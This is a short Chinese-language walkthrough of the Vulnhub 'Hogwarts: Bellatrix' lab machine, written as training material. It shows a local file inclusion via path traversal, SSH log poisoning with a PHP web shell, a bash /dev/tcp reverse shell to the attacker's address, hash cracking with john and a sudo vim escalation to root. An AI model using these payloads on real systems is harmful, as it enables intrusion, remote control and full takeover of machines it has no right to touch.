Vulnhub: Hogwarts: Bellatrix靶机

kali:192.168.111.111

靶机:192.168.111.228

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228

访问80端口

查看源码,提示ikilledsiriusblack.php和文件包含的参数名file

漏洞利用

ikilledsiriusblack.php存在文件包含

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../etc/passwd

可以包含ssh日志文件/var/log/auth.log

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log

写入webshell到ssh日志文件

复制代码
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.228

执行命令

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log&cmd=id

执行反弹shell

复制代码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

/var/www/html/c2VjcmV0cw==目录中发现密码字典和lestrange的密码密文

利用john爆破密文,密码:ihateharrypotter

复制代码
john hash --wordlist=./pass.txt

lestrange用户sudo权限

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

提升为root

复制代码
sudo -u root vim -c ':!/bin/bash'

flag

相关推荐
hcja6662 小时前
Wordpress Advanced Ads插件漏洞CVE-2025-10487复现
安全·web安全·网络安全
金纬科技3 小时前
陕煤集团-用什么-筑牢数据安全屏障、电脑加密软件那个最好用?
安全·电脑
拾忆,想起3 小时前
10分钟通关OSI七层模型:从光纤到APP的奇幻之旅
java·redis·网络协议·网络安全·缓存·哈希算法
清风6666664 小时前
基于单片机的汽车多参数安全检测与报警系统设计
单片机·安全·汽车·毕业设计·课程设计·期末大作业
catoop4 小时前
基于非对称算法的文件下载安全方案设计
安全
我科绝伦(Huanhuan Zhou)4 小时前
Redis 生产环境安全基线配置指南:从风险分析到实操加固
数据库·redis·安全
Bypass--5 小时前
《云原生安全攻防》-- K8s集群安全事件响应
安全·云原生·容器·kubernetes
众创五舟战神:l_e01206 小时前
速卖通测评自养号技术:搭建安全稳定账号体系,流量销量双突破
安全·测评自养号·速卖通测评·ip环境搭建·买家号注册下单·自养号测评技术·速卖通采购
jenchoi4136 小时前
【2025-11-05】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
Jerry25050910 小时前
什么是HTTPS?对网站有什么用?
网络·网络协议·http·网络安全·https·ssl